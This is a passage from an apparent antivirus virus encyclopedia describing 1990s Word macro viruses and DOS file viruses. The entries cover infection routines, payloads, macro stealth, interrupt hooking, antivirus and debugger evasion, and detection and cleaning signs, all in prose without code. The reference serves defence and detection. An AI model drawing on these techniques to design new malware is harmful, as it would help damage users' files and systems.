  8701. are also opened and saved (FileSaveAs).
  8702.  
  8703. WORD_Archer.A removes FileTemplates and ToolsCustomize to make
  8704. recognition of an infected document more difficult (called macro stealth
  8705. technique).
  8706.  
  8707. When a user selects ToolsMacro, WORD_Archer.A adds the following
  8708. comment to C:\AUTOEXEC.BAT:
  8709.  
  8710. "   echo BLOW ME!   "
  8711.  
  8712. WORD_Archer.A also checks the system time and in case of a 13 in the
  8713. seconds field, it adds a password to the saved document. If you find a
  8714. document with an unknown password, please download a copy of WinWord
  8715. Password Recovery Tool (wwprt). It is available at: www.vdsarg.com.
  8716.  
  8717. The second payload, which is triggered on the 5th of each month, tries
  8718. to delete files on Macintosh systems or delete all bitmap (*.BMP) files
  8719. in the following directory:
  8720.  
  8721. "   C:\WINDOWS   "
  8722.  
  8723.  
  8724.  
  8725. [WORD_Armadillo.A]
  8726.  
  8727. Virus Name: WORD_Armadillo.A
  8728. Virus Type: Word Macro Virus
  8729. Alias: None
  8730. Platform: Word 6/7
  8731. Number_of_macros: 4
  8732. Encrypted: Yes
  8733. Size_of_macros: 1265 Bytes
  8734. Place_of_origin: USA
  8735. Date_of_origin: Spring 1997
  8736. Payload: Yes
  8737. Trigger_date: Mondays
  8738. Password: None
  8739. Seen_In_The_Wild: No
  8740. Seen_where:
  8741.  
  8742. Description:
  8743.  
  8744. WORD_Armadillo.A infects the global template (normal.dot) when an
  8745. infected document is opened. Further documents become infected when
  8746. they are saved (FileSaveAs).
  8747.  
  8748. WORD_Armadillo uses ToolsMacro to make recognition of an infected
  8749. document more difficult (called macro stealth technique).
  8750. If a user selects ToolsMacro, Armadillo adds the following text 10,000
  8751. times to the active document:
  8752.  
  8753. "   Armadillon Macro?   "
  8754.  
  8755. When a user starts Microsoft Word on a Tuesday and the global template
  8756. is infected, Armadillo displays the following message:
  8757.  
  8758. "   Liven up Monday with an Armadillon!   "
  8759.  
  8760. [WORD_Cult.A]
  8761.  
  8762. Virus Name: WORD_Cult.A
  8763. Virus Type: Word Macro Virus
  8764. Alias: None
  8765. Platform: Word 6/7
  8766. Number_of_macros: 1
  8767. Encrypted: No
  8768. Size_of_macros: 1688 Bytes
  8769. Place_of_origin: Germany
  8770. Date_of_origin: Summer 1997
  8771. Destructive: No
  8772. Trigger_date: None
  8773. Password: None
  8774. Seen_In_The_Wild: No
  8775. Seen_where:
  8776.  
  8777. Description:
  8778.  
  8779. WORD_Cult.A is another intended macro virus. Due to bugs in the code
  8780. it does not infect other files.
  8781.  
  8782. The following comment can be found inside the code:
  8783.  
  8784. "   CULT! Nightmare Joker (SLAM)   "
  8785.  
  8786.  
  8787. [WORD_CVCK1.A]
  8788.  
  8789. Virus Name: WORD_CVCK1.A
  8790. Virus Type: Word Macro Virus
  8791. Alias: Chicken-Pox 0.1
  8792. Platform: Word 6/7
  8793. Number_of_macros: 11
  8794. Encrypted: Yes
  8795. Size_of_macros: 7315 Bytes
  8796. Place_of_origin: Indonesia
  8797. Date_of_origin: 1997
  8798. Destructive: No
  8799. Trigger_date: None
  8800. Password: None
  8801. Seen_In_The_Wild: No
  8802. Seen_where:
  8803.  
  8804. Description:
  8805.  
  8806. WORD_CVCK1.A infects the global template when an infected document is
  8807. closed. Further documents become infected when they are also
  8808. closed (AutoClose).
  8809.  
  8810. WORD_CVCK1.A uses ToolsMacro, ToolsCustomize and FileTemplates to make
  8811. recognition of an infected document more difficult (called macro
  8812. stealth technique).
  8813. When a user selects one of the options, WORD_CVCK1.A displays the
  8814. following:
  8815.  
  8816. "   Chicken say .........   "
  8817.  
  8818. an empty picture and
  8819.  
  8820. "   [pox-poX-pOX-POX-POx-Pox-pox]   "", .Push2
  8821.  
  8822. The following comments can be found within the code:
  8823.  
  8824. "   --------------------------------------------   "
  8825. "   Created using CVCK v.01 b                      "
  8826. "   (C)CrazybitS 1997, Yogyakarta, Indonesia       "
  8827. "   --------------------------------------------   "
  8828.  
  8829. and
  8830.  
  8831. "   Sorry ... i'm defeat you !   "
  8832.  
  8833.  
  8834.  
  8835. [WORD_CVCK1.B]
  8836.  
  8837. Virus Name: WORD_CVCK1.B
  8838. Virus Type:  Word Macro Virus
  8839. Alias: Foxz
  8840. Platform: Word 6/7
  8841. Number_of_macros: 10
  8842. Encrypted: Yes
  8843. Size_of_macros: 5551 Bytes
  8844. Place_of_origin: Indonesia
  8845. Date_of_origin: 1997
  8846. Payload: Yes
  8847. Trigger_date: None
  8848. Password: None
  8849. Seen_In_The_Wild: No
  8850. Seen_where:
  8851.  
  8852. Description:
  8853.  
  8854. WORD_CVCK1.B infects the global template when an infected document is
  8855. opened. Further documents become infected when they are
  8856. closed (AutoClose).
  8857.  
  8858. WORD_CVCK1.B uses ToolsMacro and FileTemplates to make recognition of
  8859. an infected document more difficult (called macro stealth technique).
  8860. When a user selects one of the options, WORD_CVCK1.B displays the
  8861. following:
  8862.  
  8863. "    Err = 0   "
  8864.  
  8865. Another message is displayed on the 1st and 13th of each month.
  8866.  
  8867. WORD_CVCK1.B also tries to disable printing on Sundays.
  8868.  
  8869. The following comments can be found within the code:
  8870.  
  8871. "   Foxz members of NoMercy   "
  8872. "   thank's for decrypt this virus   "
  8873. "   you may learn the effect Or somthing Else  "
  8874. "   bye,"."".""."   "
  8875. "   Foxz   "
  8876. "   If you found bug please contact me at   "
  8877. "   idban"@" hotmail.com   "
  8878.  
  8879. and
  8880.  
  8881. "   Foxz Techno         "
  8882. "   Member Of NoMercy   "
  8883.  
  8884.  
  8885. [WORD_CVCK1.C]
  8886.  
  8887. Virus Name: WORD_CVCK1.C
  8888. Virus Type:  Word Macro Virus
  8889. Alias: Vampire, 80e
  8890. Platform: Word 6/7
  8891. Number_of_macros: 6 or 9 (global template)
  8892. Encrypted: Yes
  8893. Size_of_macros: 3158 (5759) Bytes
  8894. Place_of_origin: Indonesia
  8895. Date_of_origin: 1997
  8896. Destructive: Yes
  8897. Trigger_date: Fridays
  8898. Password: None
  8899. Seen_In_The_Wild: No
  8900. Seen_where:
  8901.  
  8902. Description:
  8903.  
  8904. WORD_CVCK1.C infects the global template when an infected document is
  8905. opened. Further documents become infected when they are closed
  8906. (AutoClose).
  8907.  
  8908. WORD_CVCK1.C uses ToolsMacro, ToolCustomize and FileTemplates to make
  8909. recognition of an infected document more difficult (called macro
  8910. stealth technique).
  8911.  
  8912. When a user selects one of the options, WORD_CVCK1.C deletes all WIN.*
  8913. files in the Windows directory and displays the following message:
  8914.  
  8915. "   No risk, No Pain   "
  8916.  
  8917. Another payload triggers on Fridays when WORD_CVCK1.C erases all text
  8918. from documents.
  8919.  
  8920. The following comments can be found within the code of WORD_CVCK1.C:
  8921.  
  8922. "   Created using CVCK v.01 b   "
  8923. "   (C)CrazybitS 1997, Yogyakarta, Indonesia   "
  8924. "   Name : WM.80e aliase Vampire   "
  8925.  
  8926.  
  8927. [WORD_CVCK1.D]
  8928.  
  8929. Virus Name: WORD_CVCK1.D
  8930. Virus Type: Word Macro Virus
  8931. Alias: Vampire, 80e
  8932. Platform: Word 6/7
  8933. Number_of_macros: 6 or 9 (global template)
  8934. Encrypted: Yes
  8935. Size_of_macros: 3912 (5547) Bytes
  8936. Place_of_origin: Indonesia
  8937. Date_of_origin: 1997
  8938. Payload: Yes
  8939. Trigger_date: 13th of each month
  8940. Password: None
  8941. Seen_In_The_Wild: No
  8942. Seen_where:
  8943.  
  8944. Description:
  8945.  
  8946. WORD_CVCK1.D infects the global template when an infected document is
  8947. opened. Further documents become infected when they are closed
  8948. (AutoClose).
  8949.  
  8950. WORD_CVCK1.D uses ToolsMacro, ToolCustomize and FileTemplates to make
  8951. recognition of an infected document more difficult (called macro
  8952. stealth technique).
  8953.  
  8954. When a user selects one of the options, WORD_CVCK1.D displays the
  8955. following message: (also displayed on the 13th of each month)
  8956.  
  8957. "   Visit NoMercy WEB PAGE !   "
  8958. "   Welcome Again buddy!   "
  8959. "   It's nice create a Virus, why you don't try?   "
  8960.  
  8961. The following comments can be found within the code of WORD_CVCK1.D:
  8962.  
  8963. "   --------------------------------------------   "
  8964. "   Created using CVCK v.01 b   "
  8965. "   (C)CrazybitS 1997, Yogyakarta, Indonesia   "
  8966. "   --------------------------------------------   "
  8967. "   greeting to   "
  8968. "   -Cicatrix major collector   "
  8969. "   -D.Giovanni   "
  8970. "   -All Macro virii creator   "
  8971. "   -You that has seen the decription macro   "
  8972.  
  8973. and
  8974.  
  8975. "   Sorry ... i'm defeat you !   "
  8976.  
  8977.  
  8978. [WORD_CVCK1.E]
  8979.  
  8980. Virus Name: WORD_CVCK1.E
  8981. Virus type: Word Macro Virus
  8982. Alias: None
  8983. Platform: Word 6/7
  8984. Number_of_macros: 10
  8985. Encrypted: Yes
  8986. Size_of_macros: 5527 Bytes
  8987. Place_of_origin: Indonesia
  8988. Date_of_origin: 1997
  8989. Payload: Yes
  8990. Trigger_date: Sundays
  8991. Password: None
  8992. Seen_In_The_Wild: No
  8993. Seen_where:
  8994.  
  8995. Description:
  8996.  
  8997. The main difference between this new variant and the previous
  8998. WORD_CVCK1.B viruses is that the Action, Actiondate, and AutoOpen
  8999. macros were modified.
  9000.  
  9001. WORD_CVCK1.E infects the global template when an infected document is
  9002. opened. Further documents become infected when they are closed
  9003. (AutoClose).
  9004.  
  9005. WORD_CVCK1.E uses ToolsMacro and FileTemplates to make recognition of
  9006. an infected document more difficult (called macro stealth technique).
  9007.  
  9008. WORD_CVCK1.E also tries to disable printing on Sundays.
  9009.  
  9010. The following comment can be found within the code of WORD_CVCK1.E:
  9011.  
  9012. "   --------------------------------------------   "
  9013. "   Hey you.....   "
  9014. "   This again from NoMercy...   "
  9015. "   created by Fox`z    "
  9016. "   --------------------------------------------   "
  9017.  
  9018.  
  9019. [WORD_CVCK1.F]
  9020.  
  9021. Virus Name: WORD_CVCK1.F
  9022. Virus type: Word Macro Virus
  9023. Alias: Billy Mahone
  9024. Platform: Word 6/7
  9025. Number_of_macros: 6 or 9 (global template)
  9026. Encrypted: Yes
  9027. Size_of_macros: 2209 or 2338 Bytes
  9028. Place_of_origin: Unknown
  9029. Date_of_origin: 1997
  9030. Payload: Yes
  9031. Trigger_date: 13th of each month
  9032. Password: None
  9033. Seen_In_The_Wild: No
  9034. Seen_where:
  9035.  
  9036. Description:
  9037.  
  9038. WORD_CVCK1.F seems to be the first macro virus, created with the
  9039. CVCK1 virus generator, that was not modified after its creation.
  9040.  
  9041. WORD_CVCK1.F infects the global template when an infected document
  9042. is opened. Further documents become infected when they are closed
  9043. (AutoClose).
  9044.  
  9045. WORD_CVCK1.F uses ToolsMacro, ToolsCustomize and FileTemplates to make
  9046. recognition of an infected document more difficult (called macro
  9047. stealth technique).
  9048.  
  9049. When WORD_CVCK1.F triggers (on the 13th of each month), it displays
  9050. the following message:
  9051.  
  9052. "   Billy Mahone is back!!!   "
  9053.  
  9054. (More obscure than the virus itself is the name of the virus author,
  9055. which is a character in the movie " Flatliners ").
  9056.  
  9057. The following comment can be found within the code of WORD_CVCK1.G:
  9058.  
  9059. "   Sorry ... i'm defeat you !   "
  9060.  
  9061. and
  9062.  
  9063. "   Just bypass Nothing to do!   "
  9064.  
  9065.  
  9066. [WORD_CVCK1.G]
  9067.  
  9068. Virus Name: WORD_CVCK1.G
  9069. Virus Type: Word Macro Virus
  9070. Alias: None
  9071. Platform: Word 6/7
  9072. Number_of_macros: 5
  9073. Encrypted: Yes
  9074. Size_of_macros: 2029 Bytes
  9075. Place_of_origin: Unknown
  9076. Date_of_origin: 1997
  9077. Payload: Yes
  9078. Trigger_date: 13th of each month
  9079. Password: None
  9080. Seen_In_The_Wild: No
  9081. Seen_where:
  9082.  
  9083. Description:
  9084.  
  9085. WORD_CVCK1.G seems to be another creation of the author
  9086. of WORD_CVCK1.F. It contains another reference to the movie
  9087. "Flatliners."
  9088.  
  9089. WORD_CVCK1.G infects the global template when an infected document is
  9090. opened. Further documents become infected when they are closed
  9091. (AutoClose).
  9092.  
  9093. When WORD_CVCK1.G triggers (on the 13th of each month), it displays the
  9094. following message:
  9095.  
  9096. "   Put me in the sate of death   "
  9097.  
  9098. The following comment can be found within the code of WORD_CVCK1.G:
  9099.  
  9100. "   Sorry ... i'm defeat you !   "
  9101.  
  9102. and
  9103.  
  9104. "   Just bypass Nothing to do!   "
  9105.  
  9106.  
  9107. [WORD_CVCK1.H]
  9108.  
  9109. Virus Name: WORD_CVCK1.H
  9110. Virus Type: Word Macro Virus
  9111. Alias: None
  9112. Platform: Word 6/7
  9113. Number_of_macros: 5
  9114. Encrypted: Yes
  9115. Size_of_macros: 2031 Bytes
  9116. Place_of_origin: Unknown
  9117. Date_of_origin: 1997
  9118. Payload: Yes
  9119. Trigger_date: 13th of each month
  9120. Password: None
  9121. Seen_In_The_Wild: No
  9122. Seen_where:
  9123.  
  9124. Description:
  9125.  
  9126. WORD_CVCK1.H seems to be another creation of the author
  9127. of WORD_CVCK1.F and WORD_CVCK1.G! It contains another reference to
  9128. the movie "Flatliners."
  9129.  
  9130. WORD_CVCK1.H infects the global template when an infected document is
  9131. opened. Further documents become infected when they are closed
  9132. (AutoClose).
  9133.  
  9134. When WORD_CVCK1.H triggers (on the 13th of each month), it displays
  9135. the following message:
  9136.  
  9137. "   Today is a good day to die!!!   "
  9138.  
  9139. The following comment can be found within the code of WORD_CVCK1.H:
  9140.  
  9141. "   Sorry ... i'm defeat you !   "
  9142.  
  9143. and
  9144.  
  9145. "   Just bypass Nothing to do!   "
  9146.  
  9147.  
  9148. [WORD_CVCK1.I]
  9149.  
  9150. Virus Name: WORD_CVCK1.I
  9151. Virus Type: Word Macro Virus
  9152. Alias: None
  9153. Platform: Word 6/7
  9154. Number_of_macros: 11
  9155. Encrypted: Yes
  9156. Size_of_macros: 7329 Bytes
  9157. Place_of_origin: Unknown
  9158. Date_of_origin: 1997
  9159. Payload: Yes
  9160. Trigger_date: 11th and 31st of each month
  9161. Password: None
  9162. Seen_In_The_Wild: No
  9163. Seen_where:
  9164.  
  9165. Description:
  9166.  
  9167. The main difference between this new variant and the previous
  9168. WORD_CVCK1.A virus is that the code has been slightly modified.
  9169.  
  9170. For more information, please refer to the WORD_CVCK1.A virus
  9171. description.
  9172.  
  9173.  
  9174. [WORD_Czech.A]
  9175.  
  9176. Virus Name: WORD_Czech.A
  9177. Virus Type: Word Macro Virus
  9178. Alias: None
  9179. Platform: Word 6/7
  9180. Number_of_macros: 2
  9181. Encrypted: Yes
  9182. Size_of_macros: 424 Bytes
  9183. Place_of_origin: Unknown
  9184. Date_of_origin: Spring 1997
  9185. Payload: None
  9186. Trigger_date: None
  9187. Password: None
  9188. Seen_In_The_Wild: No
  9189. Seen_where:
  9190.  
  9191. Description:
  9192.  
  9193. WORD_Czech.A infects the global template when an infected document
  9194. is opened. Further documents become infected when they are also
  9195. opened and saved (FileSave).
  9196.  
  9197. WORD_Czech.A is another do-nothing macro virus, being only infectious.
  9198.  
  9199. [Version]
  9200. Virus Name: Version
  9201. Virus Type: Memory resident, File Virus (COM files)
  9202. Virus Length:  708 bytes
  9203.  
  9204. PC Vector Hooked: INT 21h
  9205.  
  9206. Execution Procedure:
  9207. 1) It decodes its first three bytes.
  9208. 2) Checks whether or not it is memory resident. If it is,
  9209.    goes back to the original routine directly. Otherwise, it loads
  9210.    itself resident in the high memory, then hooks INT 21h and goes
  9211.    back to the original routine.
  9212.  
  9213. Infection Procedure:
  9214. 1) Hooks INT 21h (AH=30h) to display an incorrect DOS version.
  9215. 2) Hooks INT 21h (AX=4203h) to verify whether or not the memory has
  9216.    been infected (returns AX=6969h).
  9217. 3) Hooks INT 21h(AX=4B00h)to infect COM files.
  9218.  
  9219. Damage: The call for retrieving the DOS version does not run correctly.
  9220.  
  9221. Note: This virus does not run correctly due to errors in its codes.
  9222.  
  9223. Detection method:
  9224. 1) Date and time fields of infected files are changed.
  9225. 2) Infected files increase by 705 bytes.
  9226.  
  9227. [Versikee-1326]
  9228. Virus Name: Versikee-1326
  9229. Virus Type: File Virus (EXE files)
  9230. Virus Length:  1326 bytes
  9231.  
  9232. Execution Procedure: Searches for an uninfected EXE file and
  9233. infects it (it only infects one file at a time). The searching
  9234. path is from the current directory to its subdirectory, to
  9235. subdirectories under the last subdirectory, to root directory, to
  9236. subdirectories under the root directory. If there is an infectable
  9237. file, it checks the system time. If the Seconds value is a multiple
  9238. of 8, the virus destroys the first five bytes of the file. Otherwise,
  9239. the virus just infects it. It then goes back to the original routine.
  9240.  
  9241. Damage: Destroys the first five bytes of a file depending on the value
  9242. of the Seconds field.
  9243.  
  9244. Note: Date and time fields of infected files are not changed.
  9245.  
  9246. Detection method: Length of infected files increase. The
  9247. algorithm is: first it adds the original length to make it a
  9248. multiple of 16, and then increases its length by 1326 bytes.
  9249.  
  9250. [163]
  9251. Virus Name: 163
  9252. Virus Type: File Virus (COM files)
  9253. Virus Length:  163 bytes
  9254.  
  9255. Execution Procedure:
  9256. 1) Infects uninfected COM files on the current directory. If there
  9257.    are no COM files on the current directory or at least one file is
  9258.    already infected, the virus goes back to the original routine.
  9259.  
  9260. Infection Procedure:
  9261. (1) Moves the first 163 bytes of the original file at the end.
  9262. (2) Writes the virus code onto the first 163 bytes. The file gets
  9263.     corrupted if it is less than 163 bytes.
  9264.  
  9265. Damage: None
  9266.  
  9267. Note:
  9268. 1) Does not infect the same file.
  9269. 2) Date and time fields of infected files are not changed.
  9270.  
  9271. Detection method:
  9272. 1) Infected files increase by 163 bytes.
  9273. 2) Check for "*.COM" starting from the 19Dh byte of the file.
  9274.  
  9275. [Vengence-A]
  9276. Virus Name: Vengence-A
  9277. Other Name: Vengence-194
  9278. Virus Type: File Virus (*.C* files)
  9279. Virus Length:  194 bytes
  9280.  
  9281. Execution Procedure: It infects all *.C* files on the current
  9282. directory.
  9283.  
  9284. Infection Procedure: Overwrites the first 194 bytes of the file
  9285. with the virus code. If the original file is less than 194 bytes,
  9286. the file will be 194 bytes after infection; otherwise, the length
  9287. would not change.
  9288.  
  9289. Damage: It overwrites the first 194 bytes of the original file with
  9290. the virus code, thus corrupting the file.
  9291.  
  9292. Detection method:
  9293. 1) Date and time fields of infected files are changed.
  9294. 2) The following text can be found at the end of infected files:
  9295.  
  9296.     "Vengence-A virus. Lastest release from Swedish Virus
  9297.      Association. Released 7th of May 1992. Happy hacking and
  9298.      greetings to all Virus writers..."
  9299.  
  9300. [Vengence-B]
  9301. Virus Name: Vengence-B
  9302. Other Name: Vengence-252
  9303. Virus Type: File Virus (*.C*, mainly COM files)
  9304. Virus Length:  252 bytes
  9305.  
  9306. Execution Procedure: It infects *.C* files on the current
  9307. directory.
  9308.  
  9309. Infection Procedure: Overwrites the first 252 bytes of the file
  9310. with the virus code. If the original file is less than 252 bytes,
  9311. the file will be 252 bytes after infection; otherwise, the length
  9312. would not change.
  9313.  
  9314. Damage: It overwrites the first 252 bytes of the original file thus
  9315. corrupting the file.
  9316.  
  9317. Note: Date and time fields of infected files are not changed.
  9318.  
  9319. Detection method:
  9320. The following text can be found at the end of infected files:
  9321.  
  9322.     "Vengence-B virus. Lastest release from Swedish Virus
  9323.      Association. Released 8th of May 1992. Satan will come and
  9324.      rule his world and his people!"
  9325.  
  9326. [Vengence-C]
  9327. Virus Name: Vengence-C
  9328. Other Name: Vengence-390
  9329. Virus Type: File Virus (*.C*, mainly COM files)
  9330. Virus Length:  390 bytes
  9331.  
  9332. Execution Procedure: It infects the first *.C* file on the
  9333. current directory.
  9334.  
  9335. Infection Procedure: Overwrites the first 390 bytes of the file
  9336. with the virus code. If the original file is less than 390 bytes,
  9337. the file will be 390 bytes after infection; otherwise, the length
  9338. would not change.
  9339.  
  9340. Damage: It overwrites the first 390 bytes of the original file thus
  9341. corrupting the file.
  9342.  
  9343. Note:
  9344. 1) Date and time fields of infected files are not changed.
  9345. 2) When the virus is executed, it checks first for any anti-virus
  9346.    software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and
  9347.    TBSCANX. The virus stops executing if any of these programs exist.
  9348.  
  9349. Detection method:
  9350. The following text can be found at the end of infected files:
  9351.  
  9352.     "Vengence-C virus. Lastest release from Swedish Virus
  9353.      Association. Released 8th of May 1992. Satan will come and
  9354.      rule his world and his people!"
  9355.  
  9356. [Vengence-D]
  9357. Virus Name: Vengence-D
  9358. Other Name: Vengence-435
  9359. Virus Type: File Virus (*.C*, mainly COM files)
  9360. Virus Length:  435 bytes
  9361.  
  9362. Execution Procedure:
  9363. 1) Checks whether or not the current time is 12:00(AM). If it is,
  9364.    it displays the following message and then increases the system
  9365.    time by an hour.
  9366.  
  9367.     "Vengence-D virus. Lastest release from Swedish Virus
  9368.      Association. Released 8th of May 1992. Satan will come and
  9369.      rule his world and his people!"
  9370.  
  9371. 2) Infects the first *.C* file on the current directory.
  9372.  
  9373. Infection Procedure: Overwrites the first 435 bytes of the file
  9374. with the virus code. If the original file is less than 435 bytes,
  9375. the file will be 435 bytes after infection; otherwise, the length
  9376. would not change.
  9377.  
  9378. Damage: It overwrites the first 435 bytes of the original file thus
  9379. corrupting the file.
  9380.  
  9381. Note:
  9382. 1) Date and time fields of infected files are not changed.
  9383. 2) When the virus is executed, it checks first for any anti-virus
  9384.    software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and
  9385.    TBSCANX. The virus stops executing if any of these programs exist.
  9386.  
  9387. Detection method: Check for the text mentioned above.
  9388.  
  9389. [Vengence-F]
  9390. Virus Name: Vengence-F
  9391. Other Name: Vengence-656
  9392. Virus Type: File Virus (*.C*, mainly COM files)
  9393. Virus Length:  656 bytes
  9394.  
  9395. Execution Procedure:
  9396. 1) Checks whether or not the current time is 12:00(AM). If it is,
  9397.    it displays the following message and then increases the system
  9398.    time by an hour.
  9399.  
  9400.     "Vengence-F virus. Debugging session unlimited."
  9401.  
  9402. 2) Infects the first *.C* file on the current, its father, its
  9403.    father's father directory, and so on.
  9404.  
  9405. Infection Procedure: Moves the first 656 bytes of the file at the
  9406. end and then writes the virus code onto the first 656 bytes. It then
  9407. attaches "SVC" at the end of the file.
  9408.  
  9409. Damage: Infected files cannot execute.
  9410.  
  9411. Note:
  9412. 1) Date and time fields of infected files are not changed.
  9413. 2) When the virus is executed, it checks:
  9414.    - whether it is being traced by Debug. If it is, it halts the system.
  9415.    - for anti-virus programs like F-LOCK, F-POPUP, F-FCHK, F-DLOCK,
  9416.      ThunderByte and TBSCANX. If any of these programs exist, the virus
  9417.      stops executing.
  9418.  
  9419. Detection method:
  9420. 1) Check for the text mentioned above.
  9421. 2) Check for the word "SVC" at the end of infected files.
  9422. 3) Infected files increase by 656 bytes.
  9423.  
  9424. Cleaning Method: Delete the first 656 bytes and "SVC" at the end of
  9425. infected files. If the file is larger than 656 bytes, move the last
  9426. 656 bytes up front.
  9427.  
  9428. [V500]
  9429. Virus Name: V500
  9430. Virus Type: Memory Resident(OS), File Virus (COM files)
  9431. Virus Length:  500 bytes
  9432.  
  9433. PC Vectors Hooked: INT 21H
  9434.  
  9435. Execution Procedure: The virus checks whether the DOS version is 3.3.
  9436. If not, it goes back to the original routine directly. Otherwise, it
  9437. stays resident in the memory (OS area).
  9438.  
  9439. While in the memory the virus calls INT 86h to infect COM files when
  9440. INT 00h-0Ch is called. It then goes back to the original routine. The
  9441. virus reinfects files.
  9442.  
  9443. Infection Procedure: The virus moves the first 500 bytes of the file
  9444. at the end, then writes the virus code on front.
  9445.  
  9446. Damage: None
  9447.  
  9448. Note: Date and time fields of infected files are not changed.
  9449.  
  9450. Detection method: Infected files increase by 500 bytes.
  9451.  
  9452. [Crazy-L15]
  9453. Virus Name: Crazy-I15
  9454. Virus Type: Memory Resident(HiMem), File Virus (COM files)
  9455. Virus Length: 1,402 bytes
  9456.  
  9457. PC vectors Hooked: Int 21h, INT 24h
  9458.  
  9459. Execution Procedure:
  9460. 1) Checks whether or not it resides in the memory. If not, it loads
  9461.    itself resident in the high memory.
  9462. 2) Hooks INT 21h.
  9463. 3) Goes back to the original routine.
  9464.  
  9465. Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. First, it
  9466. hangs INT 24h to prevent divulging its trace when writing,
  9467. then checks whether the program to be executed is an uninfected
  9468. COM file. If it is, the virus infects it. Lastly, it restores
  9469. INT 24h.
  9470.  
  9471. Damage: None
  9472.  
  9473. Detection method: Infected files increase by 1402 bytes.
  9474.  
  9475. [Variety]
  9476. Virus Name: Variety
  9477. Virus Type: File Virus (COM files)
  9478. Virus Length:  625 bytes
  9479.  
  9480. Execution Procedure:
  9481. 1) The virus decodes.
  9482. 2) Infects a COM file on the current directory (it only infects
  9483.    one file at a time).
  9484.  
  9485. Infection Procedure:
  9486. 1) It encodes the virus code.
  9487. 2) Attaches the viral code at the end of the original file.
  9488.  
  9489. Damage: None
  9490.  
  9491. Note:
  9492. 1) If the DOS version is not above 2.0, the virus will not infect
  9493.    files.
  9494. 2) Time and date fields of infected files are not changed.
  9495.  
  9496. Detection method: Infected files increase by 625 bytes.
  9497.  
  9498. [Infector]
  9499. Virus Name: Infector
  9500. Virus Type: File Virus (COM files)
  9501. Virus Length:  820-830 bytes
  9502.  
  9503. Execution Procedure:
  9504. Searches for an uninfected COM file on the current directory, and
  9505. then proceeds to infect it (it only infects one file at a time).
  9506.  
  9507. Damage: None
  9508.  
  9509. Note:
  9510. 1) Most infected files cannot be executed due to the poor quality
  9511.    of the virus procedure.
  9512. 2) Does not stay in the memory.
  9513. 3) You will see an error message when writing because INT 24h has
  9514.    not been hanged.
  9515.  
  9516. Detection method: Infected files increase by 820 to 830 bytes.
  9517.  
  9518. [Irish-3]
  9519. Virus Name: Irish-3
  9520. Virus Type: File Virus (COM files)
  9521. Virus Length:  1164 bytes
  9522.  
  9523. PC Vectors Hooked: INT 21h, INT 1Ch
  9524.  
  9525. Execution Procedure:
  9526. 1) Checks whether or not it is memory resident. If not, it loads
  9527.    itself resident in the high memory.
  9528. 2) Hooks INT 21h,INT 1Ch and goes back to the original routine.
  9529.  
  9530. Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. It
  9531. checks whether the program to be executed is an uninfected COM
  9532. file. If it is, the virus infects it. If it is an uninfected
  9533. EXE file, the virus creates a new COM file (with length between
  9534. 2000 and 4000 bytes) with the same file name as the original EXE file.
  9535. This new COM file contains the virus code.
  9536.  
  9537. Damage: None
  9538.  
  9539. Note:
  9540. 1) If the current date is November 21, it counts time by hooking INT
  9541.    08h. After a few minutes, it displays the following message:
  9542.  
  9543.    "Virus V2.0 (c) 1991 Necros The Hacher Written on 29,30
  9544.    June.................................. ...................."
  9545.  
  9546. 2) You will see an error message when writing because INT 24h has
  9547.    not been hanged.
  9548.  
  9549. Detection method: Infected files increase by 1164 bytes.
  9550.  
  9551. [101]
  9552. Virus Name: 101
  9553. Virus Type: File Virus
  9554. Virus Length: 2560 bytes
  9555.  
  9556. Execution Procedure: When all the files (COM and EXE) have been
  9557. infected in the current drive, the virus will check the system date
  9558. to determine whether it is a multiple of 9 (for example 9th, 18th,
  9559. 27th). If "yes," all the text on the screen will be confused and
  9560. down-shifted. If not the virus will modify the boot sector and continue
  9561. to infect another drive.
  9562.  
  9563. Damage: All the files (COM and EXE) will be infected and increased by
  9564. 2560 Bytes. Infected file contains the string "VIRUS 101".
  9565.  
  9566.  
  9567. [1339]
  9568. Virus Name: 1339
  9569. Other Names: Vacsina virus
  9570. Virus Type: Parasitic Virus
  9571. Virus Length: 1339 bytes
  9572.  
  9573. Symptoms: Increases infected .COM file sizes by 1339 bytes, .EXE files
  9574. by 1471 bytes. Infected files contain the word "VACSINA". Decreases the
  9575. size of free RAM memory.
  9576.  
  9577. Damage: No damage, no manipulation.
  9578.  
  9579. Note: First the virus tests to determine if it is already in memory
  9580. (it uses interrupt vector 31h for this purpose). If it is not in memory
  9581. yet, it installs itself before the infected program (using MCB
  9582. modification, it allocates 1344 bytes). After installation the virus
  9583. monitors DOS EXEC function and infects all uninfected programs. This
  9584. virus is one of a group of viruses which cooperates with each other.
  9585. This group has every virus of its own level, a virus can remove some
  9586. other Vacsina with lower level 10h. It can remove viruses with level
  9587. less than 10h. To spread, a Vacsina virus uses direct interrupt 21h.
  9588.  
  9589. [1701/1704]
  9590. Virus Name: 1701/1704
  9591. Other Names: Raindrop virus
  9592. Virus Type: Parasitic Virus
  9593. Virus Length: 1701/1704 bytes
  9594.  
  9595. Symptoms: Increases infected .COM file sizes by 1701/1704 bytes when
  9596. the system date is between October and December, 1988. Five minutes
  9597. after installation, virus will scan all the characters on screen
  9598. and down-shift one by one as if it were raining.
  9599.  
  9600. Damage: No damage. System will halt after virus is activated.
  9601.  
  9602.  
  9603. [2881]
  9604. Virus Name: 2881
  9605. Other Names: Yankee Doodle virus
  9606. Virus Type: Parasitic Virus
  9607. Virus Length: 2881 bytes
  9608.  
  9609. Symptoms: Increases infected file size by approximately 2881 bytes and
  9610. decreases the size of free RAM memory. Infected .COM files display
  9611. 7A4Fh and 2Ch as their end words (flagf for other viruses, for example:
  9612. for Vacsina virus). Virus will play "Yankee Doodle" when some
  9613. conditions are met (see damage).
  9614.  
  9615. Damage: Ping-Pong virus modification: it modifies the Ping-Pong virus
  9616. in memory. It changes two bytes, one jump and adds one subroutine. It
  9617. is very interesting that Ping-Pong virus is ready for this change.
  9618. After this reboot (it writes this count to all disks) and after 255
  9619. reboots, the Ping-Pong virus immediately deactivates into the memory
  9620. (it returns original interrupt vector 13h and the value of 0:413h).
  9621. Subsequently, "Yankee Doodle" is played.
  9622.  
  9623. [2928]
  9624. Virus Name: 2928
  9625. Other Names: Yankee Doodle virus
  9626. Virus Type: Parasitic Virus
  9627. Virus Length: 2928 bytes
  9628.  
  9629. Symptoms: Increases infected file size by approximately 2928 bytes and
